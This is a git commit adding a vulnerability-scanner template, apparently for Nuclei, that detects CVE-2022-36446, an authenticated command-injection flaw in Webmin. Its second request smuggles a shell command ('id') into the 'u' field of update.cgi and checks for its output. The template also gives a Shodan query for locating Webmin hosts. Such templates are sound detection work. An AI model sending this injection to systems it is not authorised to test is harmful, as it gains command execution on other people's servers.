Merge pull request #5173 from gy741/rule-add-v121

Create CVE-2022-36446.yaml
2023-02-10 16:53:05 +05:30 · 2023-02-10 16:53:05 +05:30 · 7d5df5f621
parent 7e05c15ad4 29c84ec94f
commit 7d5df5f621
1 changed files with 49 additions and 0 deletions
--- a/cves/2022/CVE-2022-36446.yaml
+++ b/cves/2022/CVE-2022-36446.yaml
@ -0,0 +1,49 @@
+id: CVE-2022-36446
+
+info:
+  name: Webmin - Remote Code Execution (Authenticated)
+  author: gy741
+  severity: critical
+  description: |
+    Webmin before 1.997  is vulnerable to RCE exploits. an authenticated, remote attacker to perform command injection attacks.
+  reference:
+    - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
+    - https://www.exploit-db.com/exploits/50998
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-36446
+  classification:
+    cve-id: CVE-2022-36446
+  metadata:
+    shodan-query: title:"Webmin"
+  tags: cve,cve2022,webmin,rce,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /session_login.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user={{username}}&pass={{password}}
+
+      - |
+        POST /package-updates/update.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Referer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1
+
+        mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{randstr}}'
+          - 'uid'
+          - 'gid'
+          - 'groups'
+        condition: and
+
+      - type: status
+        status:
+          - 200